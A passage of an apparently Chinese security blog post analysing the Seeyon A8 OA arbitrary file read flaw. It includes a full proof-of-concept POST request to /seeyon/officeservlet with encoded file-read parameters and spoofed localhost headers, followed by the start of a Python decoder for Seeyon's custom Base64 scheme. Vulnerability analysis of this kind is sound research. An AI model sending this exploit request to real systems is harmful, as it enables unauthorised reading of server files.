一、前言

这段时间从其他师傅那里拿到了分析的致远源码，想着就照着历史漏洞来做个算是仔细的分析。

这边选取致远A8的任意文件读取漏洞来结合源码分析下，首先漏洞利用POC如下

POST /seeyon/officeservlet HTTP/1.1
Host: xxxx
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=98FCAEBB95CCBEB2C7209BEF7EAA7B3E; loginPageURL=
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 350

DBSTEP V3.0     285             0               0              
RECORDID=wLoi
CREATEDATE=wLehP4whzUoiw=66
originalFileId=wLoi
needReadFile=yRWZdAS6
originalCreateDate=wLehP4whzUoiw=66
OPTION=LKDxOWOWLlxwVlOW
TEMPLATE=qf85qf85qfDfeazQqAzvcRevy1W3eazvNaMUySz3d7TsdRDsyaM3nYli
COMMAND=BSTLOlMSOCQwOV66
affairMemberId=wLoi
affairMemberName=wLoi

二、漏洞分析

首先看上面的请求体中带有加密后传的参数内容，这类是属于致远自定的Base64编码的变种，详细解密方法可以参考kk师傅的文章：致远 OA 变种 BASE64 算法的加解密方法（https://paper.seebug.org/964/）

这里贴上一个解密脚本，仅可用于解密传参，不能解密数据库密码密文

import base64

# 自定义的Base64编码表
a = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
# 标准的Base64编码表
b = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="

# 函数：自定义Base64编码转换为标准Base64编码
def custom_to_standard(custom_base64_str):
    standard_base64_str = ""
    # 创建映射字典
    custom_to_standard_map = {ca: cb for ca, cb in zip(a, b)}

    for char in custom_base64_str:
        # 查找自定义字符对应的标准Ba